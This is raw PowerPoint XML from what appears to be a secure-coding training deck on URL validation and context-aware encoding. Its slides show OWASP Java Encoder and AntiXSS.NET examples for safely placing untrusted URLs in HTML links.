        <p:txBody>
          <a:bodyPr wrap="square" lIns="182880" tIns="91440" rIns="182880" bIns="91440" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="91" name="TextBox 90"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4030010" y="3916197"/>
            <a:ext cx="2428170" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="40000"/>
              <a:lumOff val="60000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="182880" tIns="228600" rIns="182880" bIns="91440" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1"/>
              <a:t>Encode URL in the right context of display</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="93" name="TextBox 92"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4200106" y="3451248"/>
            <a:ext cx="654084" cy="657732"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="182880" tIns="91440" rIns="182880" bIns="91440" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="20" name="Group 19"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6970003" y="466529"/>
            <a:ext cx="1716797" cy="1465129"/>
            <a:chOff x="6714321" y="635329"/>
            <a:chExt cx="1716797" cy="1465129"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="21" name="Group 20"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6835420" y="635329"/>
              <a:ext cx="1465134" cy="1465129"/>
              <a:chOff x="3285453" y="1431558"/>
              <a:chExt cx="1465134" cy="1465129"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="23" name="Oval 22"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3285453" y="1431558"/>
                <a:ext cx="1465134" cy="1465129"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ln w="38100" cmpd="sng">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>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p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3373277" y="1519470"/>
                <a:ext cx="1289487" cy="1289304"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="accent4"/>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2" name="TextBox 21"/>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URL</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457201" y="5393896"/>
            <a:ext cx="8229599" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>UNTRUSTED URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>"&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="DB3D16"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>UNTRUSTED URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;/a&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3484025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additive="base">
                                        <p:cTn id="16" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="82"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="17"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additive="base">
                                        <p:cTn id="26" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="83"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="27"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ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="33" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="75"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_h/2"/>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="37"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500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="93"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="43" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="93"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_h/2"/>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91"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="46" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="91"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="47"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900" decel="100000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2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82" grpId="0" animBg="1"/>
      <p:bldP spid="83" grpId="0" animBg="1"/>
      <p:bldP spid="85" grpId="0" animBg="1"/>
      <p:bldP spid="86" grpId="0" animBg="1"/>
      <p:bldP spid="91" grpId="0" animBg="1"/>
      <p:bldP spid="93" grpId="0" animBg="1"/>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921"/>
            <a:ext cx="9143999" cy="683193"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Server-side URL Validation in Java</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8686800" y="6356351"/>
            <a:ext cx="457200" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>56</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E887344E-BCAB-EE4A-A51A-3A8CD78F641A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="496955" y="1122473"/>
            <a:ext cx="8150087" cy="5023152"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="295198964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B444F8-8AD1-0A40-BC89-CB61B938D16B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="146511"/>
            <a:ext cx="9144000" cy="744836"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" kern="1200">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Client-side URL Validation in React</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C4988DA-BA5F-4445-AC20-B74F927BAE80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="296819" y="1158392"/>
            <a:ext cx="8550361" cy="4745451"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2982228794"/>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
              <a:t>Escaping When Managing Complete URLs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Content Placeholder 22"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Assuming the untrusted URL has been properly validated</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>58</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="25" name="Group 24"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="1926131"/>
            <a:ext cx="8229052" cy="1717555"/>
            <a:chOff x="457200" y="3504779"/>
            <a:chExt cx="8229052" cy="1717555"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="26" name="Picture 25"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5" b="60939"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="3854128"/>
              <a:ext cx="8229052" cy="1188720"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="Content Placeholder 4"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="790400" y="4044511"/>
              <a:ext cx="7895852" cy="1177823"/>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800" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>&lt;a </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1800" b="1" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>href</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1800" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>="&lt;%= </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1800" b="1" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>Encode.forHTMLAttribute</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1800" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1800" b="1" err="1">
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>untrustedURL</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1800" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>) %&gt;"&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="182880" indent="-457200">
                <a:lnSpc>
                  <a:spcPct val="110000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1800" b="1" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>Encode.forHtml</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1800" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1800" b="1" err="1">
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>untrustedURL</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1800" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>) </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="182880" indent="-457200">
                <a:lnSpc>
                  <a:spcPct val="110000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1800" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>&lt;/a&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="182880" indent="-457200">
                <a:lnSpc>
                  <a:spcPct val="110000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28"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OWASP Java Encoder</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="29" name="Group 28"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="3837218"/>
            <a:ext cx="8229052" cy="1381173"/>
            <a:chOff x="457200" y="3504779"/>
            <a:chExt cx="8229052" cy="1381173"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="30" name="Picture 29"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5" b="76565"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="3854127"/>
              <a:ext cx="8229052" cy="1031825"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="Content Placeholder 4"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="790400" y="4044511"/>
              <a:ext cx="7895852" cy="808427"/>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600" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>&lt;a </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>href</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>="&lt;%= </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>Encoder.HtmlAttributeEncode</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" err="1">
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>untrustedURL</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>) %&gt;"&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="182880" indent="-457200">
                <a:lnSpc>
                  <a:spcPct val="110000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>Encoder.HtmlEncode</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" err="1">
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>untrustedURL</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>) </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="182880" indent="-457200">
                <a:lnSpc>
                  <a:spcPct val="110000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>&lt;/a&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32"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err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>AntiXSS.NET</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
